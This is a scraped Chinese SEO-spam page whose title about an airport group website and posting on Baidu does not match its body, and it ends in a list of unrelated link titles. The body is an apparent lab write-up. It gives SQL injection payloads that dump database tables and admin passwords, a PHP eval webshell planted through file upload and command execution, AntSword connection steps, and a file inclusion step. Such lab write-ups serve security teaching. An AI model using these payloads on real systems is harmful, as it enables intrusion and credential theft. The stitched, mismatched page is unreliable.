当前位置: 首页 > wzjs >正文

黑龙江省机场建设集团官网网站怎么在百度上发表文章

黑龙江省机场建设集团官网网站,怎么在百度上发表文章,发光字体制作网站,素材寻找漏洞 一,我们打开页面 第一个漏洞 xss漏洞 1.在登录页面显示有弹窗 第二个漏洞 sql注入漏洞 1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名 -1 union select 1,database(),3# 3.查看表名 -1 union select 1,2,group…

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.dtcms.com/wzjs/184154.html

相关文章:

  • 做公司网站需要什么程序搜外
  • 网站优化都是怎么做的株洲最新今日头条
  • 推荐一些做电子的网站青岛百度快速优化排名
  • 继续教育网站怎么做不了作业seo怎么学
  • 重庆做网站优化网络营销和市场营销的区别
  • 广 做网站蓝光电影下载网络营销名词解释
  • 做网站空间哪家好竞价sem托管
  • 怎么做一种网站为别人宣传seo搜索是什么
  • 网站系统制作教程视频教程手机网站模板下载
  • 企业vi品牌设计广州seo网络推广员
  • icp备案需要先建设网站么设计公司
  • 免费网站可以做cpa?凡科建站快车
  • 沧州百胜信息技术有限公司杭州网站seo推广软件
  • 个人网站备案审批网站seo基本流程
  • 企业注册登记查询福州seo快速排名软件
  • 北京简约网站建设公司郑州网站优化哪家好
  • seo的网站淄博百度推广
  • 济南mip网站建设公司上海网站seo招聘
  • 网络推广团队分工广州seo优化排名公司
  • 2015做外贸网站好做吗企业网络组建方案
  • 百度网站优化排名互联网营销策划
  • 什么是网站栏目标题seo成创网络
  • 视频分享网站模板企业如何注册自己的网站
  • 购物网站排名第一的有哪些网络营销的目的和意义
  • 安徽招标网官网郑州seo顾问阿亮
  • 免费ppt模板下载大全网站搜索广告是什么意思
  • 青岛seo网站排名北京seo代理公司
  • 建设建材网站什么网站推广比较好
  • 做新闻网站的素材中国新闻网发稿
  • 注册公司流程图片对seo的理解